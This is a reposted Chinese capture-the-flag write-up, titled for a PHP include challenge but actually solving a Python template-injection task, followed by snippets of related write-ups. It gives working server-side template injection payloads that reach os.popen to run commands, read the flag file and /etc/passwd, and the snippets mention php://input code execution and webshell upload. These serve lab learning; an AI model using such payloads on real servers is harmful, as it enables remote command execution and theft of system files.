(转载)攻防世界Web_php_include

最新推荐文章于 2024-09-07 15:57:32 发布
最新推荐文章于 2024-09-07 15:57:32 发布
阅读量140 收藏
点赞数
分类专栏: ctf练习题
原文链接:https://adworld.xctf.org.cn/task/writeup?type=web&id=5408&number=3&grade=1&page=1
版权

web_python_template_injection

解题思路:

-首先看到题目,就知道这道题是关于模板注入的,什么是模板注入呢?

-为了写html代码的时候方便,很多网站都会使用模板,先写好一个html模板文件

比如:

def test():
code=request.args.get('id')
html='''
   <h3>%s</h3>
'''%(code)
return render_template_string(html)

这段代码中的html就是一个简单的模板文件,当开发者想要这个模板对应的样式时,可以直接用render_template_string方法来调用这个模板,从而直接把这个样式渲染出来。

而模板注入,就是指将一串指令代替变量传入模板中让它执行,以这段代码为例,我们在传入code值时,可以用{{}}符号来包裹一系列代码,以此替代本应是参数的id

```http://..../?id={{代码}}```

-知道了什么是模板文件,接下来开始模板注入环节

首先,先测试一下是不是确实能注入,构造一个简单的测试url:

`http://111.198.29.45:46675/{{7*7}}`

服务器回传:

URLhttp://111.198.29.45:46675/49 not found

/49的存在说明7*7这条指令被忠实地执行了。

接下来,开始想办法编代码拿到服务器的控制台权限:

-首先,题目告诉我们这是一个python注入问题,那么脚本肯定也是python的,思考怎样用python语句获取控制台权限:想到了os.systemos.popen(参考资料),这两句前者返回退出状态码,后者以file形式返回输出内容,我们想要的是内容,所所以选择os.popen
-知道了要用这一句,那么我要怎么找到这一句呢?python给我们提供了完整的寻找链(参考资料):
-class:返回对象所属的类

mro:返回一个类所继承的基类元组,方法在解析时按照元组的顺序解析。

base:返回该类所继承的基类//__base__和__mro__都是用来寻找基类的

subclasses:每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表

init:类的初始化方法

globals:对包含函数全局变量的字典的引用

-首先,找到当前变量所在的类:
111.198.29.45:46675/%7B%7B''.__class__%7D%7D

服务器回复:

URLhttp://111.198.29.45:46675/<type'str'>notfound

发现这个回复里已经告诉我们这个变量的类是’str’了。

-接下来,从这个类找到它的基类:
http://111.198.29.45:46675/%7B%7B''.__class__.__mro__%7D%7D

服务器回复:

URLhttp://111.198.29.45:46675/(<type'str'>,<type'basestring'>,<type'object'>)notfound

发现基类也有了。

-然后,通过基类来找其中任意一个基类的引用列表:

http://111.198.29.45:46675/%7B%7B''.__class__.__mro__[2].__subclasses__()%7D%7D

这里有个小细节,__mro__[]中括号里填谁其实区别都不大,这些基类引用的东西都一样。

服务器回复了很长的一个列表,我就不列举了,从其中可以找到我们想要的os所在的site._Printer类,它在列表的第七十二位,即__subclasses__()[71]

-通过__subclasses__()[71].__init__.__globals__['os'].popen('命令行语句').read()调用服务器的控制台****并显示,这下我们就可以随便用控制台输出了。

直接填命令语句:

http://111.198.29.45:46675/%7B%7B''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()%7D%7D

注意这里的popen('ls').read(),意思是得到ls的结果并读取给变量
因此它会把当前目录所有文件都打印在我们的网页上,内容如下:

URLhttp://111.198.29.45:46675/fl4gindex.pynotfound

从这里我们看到,flag存在一个叫fl4g的无后缀文件里,那就好办了,再构造一个payload,用cat读一下内容:

http://111.198.29.45:46675/%7B%7B''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('catfl4g').read()%7D%7D

服务器回复:

`URLhttp://111.198.29.45:46675/ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}notfound`

flag到手~##注意事项:

‘’.class.mro[2].subclasses()[71].init.globals[‘os’].popen(‘catfl4g’).read()

以上payload是一个非常常用的payload,同样常用的还有

.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].system('ls').__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()

转载自攻防世界Web_php_include WP里EndermaN 师傅上传的文章,侵权私信删除

yingyugo
关注
专栏目录
攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 3632
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
攻防世界 Web_php_include 解题思路
xj28555的博客
07-07 4204
进入题目 一串简短的PHP代码,这里对page这个参数用str_replace函数进行了过滤,str_replace函数的作用是匹配前面一段字符,匹配到的话就替换成后面一段,所以这里的代码意思就是,假如我们传入的page参数包含php://就会被替换成空字符。并且判断page里面文件是否存在,存在则包含文件。 当然这题有多种解法,我这里就讲述三种。 第一种 绕过str_replace函数,对渗透测试有点了解的都知道str_replace这个函数及其不安全,可以利用大小写绕过,双写绕过等,这里我用
攻防世界-Web_php_include (四种解法)
笑花大王
01-20 4549
攻防世界-Web_php_include (考察的是文件包含) 打开页面是这样一段代码从代码中得知page中带有php://的都会被替换成空 str_replace()以其他字符替换字符串中的一些字符(区分大小写) strstr() 查找字符串首次出现的位置。返回字符串剩余部分 <?php show_source(__FILE__); echo $_GET['hello'];...
攻防世界-Web_php_include详解
Mr_helloword的博客
08-11 9219
Web_php_include 源代码: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 分析: strstr(): 定义和用法: 搜索字符串在另一个字符串中是否存在,如果是,返回字符串及剩余部分,否则返回
攻防世界Web_php_include详解
weixin_63810302的博客
06-21 4698
ctf学习记录
攻防世界-web Web_php_include
m0_48108919的博客
02-10 1312
根据题目这题应该要用到php文件包含 分析代码: strstr() 函数用法:搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE(该函数是区分大小写的) //例如: echo strstr("Hello world!","world"); // 输出 world! str_replace() 函数用法:替换字符串中的一些字符(区分大小写) //例如: echo str_replace("world","Peter","Hello world!"); //输出Hell
攻防世界 web进阶区 Web_php_include
m0_51395584的博客
06-15 249
打开链接,直接是代码审计 从代码中可以知道,可以有两个get参数请求,分别是hello和page,hello的参数直接返回,我们主要看page参数的处理。 strstr()函数会检测$page参数中是否存在php://,如果存在,则进入循环,否则返回false,str_replace()函数会将page中的’hp://替换为空,因为是while循环,所以会替换所有的php://,包括拼接的。 由此可知该题考查的是php伪协议的利用,这里可以进行大小写绕过,同时还可以使用另一个伪协议data://text/
攻防世界Web_php_include
snowlyzz的博客
05-06 221
先看源码: 先来了解下strstr函数: 知识点: strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。该函数是区分大小写的,stristr()函数不区分大小写。 str_replace str_replace() 函数替换字符串中的一些字符(区分大小写)。 该函数必须遵循下列规则: 如果搜索的字符串是一个数组,那么它将返回一个数组。 如果搜索的字符串是一个数组,那么它将对数组中的每个元素进行查找和替换。 如果同时需要对某个数组进...
攻防世界 Web_php_unserialize
beiweixiaotian66的博客
09-07 851
因为GET传参还要经过一个Base64的解码,所以对这个表达式还要经过base64的加密。因为前面还有个正则表达式,所以我们还需要绕过这个正则表达式,使用。然后我们知道怎么绕过了,可不可以直接自己手动绕过,base加密捏。如果表示对象属性个数的值大于真实的属性个数时,就可以绕过。代表着后面的变量名长度应是10,但好像只有八位?表示空字符,但是还是占用一个字符位置。但是这样的base和上面不一样。,这样base出来就是一样的了。方法,写一个反序列化的脚本。这道题我们需要的文件是。,所以我们主要需要绕过。
攻防世界 Web_php_include
qq_42385363的博客
05-22 156
利用php伪协议大小写绕过题目给了源码,根据提示知道是文件包含,分析源码可以发现 php://被过滤了,但是还可以用其他的伪协议进行绕过。
【网络安全 | CTF】攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
热门推荐
等风来
05-22 1万+
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 475
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。区分大小写,stristr()函数不区分大小写。 string:必需。规定.
攻防世界WEB——Web_php_include
Zeker62的博客
08-16 482
借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下 源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函
攻防世界 Web_php_include(include)
Haowill的博客
04-15 1016
Web_php_include 一拿到这道题目看到include,我觉得像是一道文件包含漏洞的题目,这种漏洞一般做法有两种 1.包含的文件在本地上传一个webshell去,该webshell在本地,运行webshell就可以用菜刀去连上 2.如果包含的文件不本地,是远程的网上的文件,那么我们可以黑它远程的那个文件。这样也可以getshell。 拿到题目 很有意思这个题目给的是源代码。 <?...
基于asp.net的工作流程审批系统设计与实现.docx
09-30
基于asp.net的工作流程审批系统设计与实现.docx
这是各种对象检测数据集的预处理相关工具脚本的集合.zip
09-30
这是各种对象检测数据集的预处理相关工具脚本的集合
基于asp.net的驾校理论考试网上模拟系统设计与实现.docx
09-30
基于asp.net的驾校理论考试网上模拟系统设计与实现.docx
基于Python与Shell的阿里巴巴智能运维竞赛排名14设计源码
09-30
该项目为阿里巴巴智能运维竞赛排名14的设计源码,采用Python和Shell两种编程语言,共包含27个文件,包括2个Python脚本、1个PDF文档、1个Markdown文件、1个文本文件、1个CSV文件、1个Shell脚本以及5个特定数据模型文件。该解决方案旨在提升运维效率,适用于大型企业的智能运维场景。
DRF完整项目及uwsgi部署配置
最新发布
09-30
DRF完整项目及uwsgi部署配置
攻防世界web_php_include
03-16
攻防世界中的 web_php_include 是一种漏洞,它指的是在 PHP 程序中使用 include 或 require 语句加载文件时可能存在的安全问题。这种漏洞可能导致远程代码执行攻击,允许攻击者在服务器上执行任意代码。为了防止这种漏洞,应该对包含的文件进行严格验证,确保只包含可信的文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值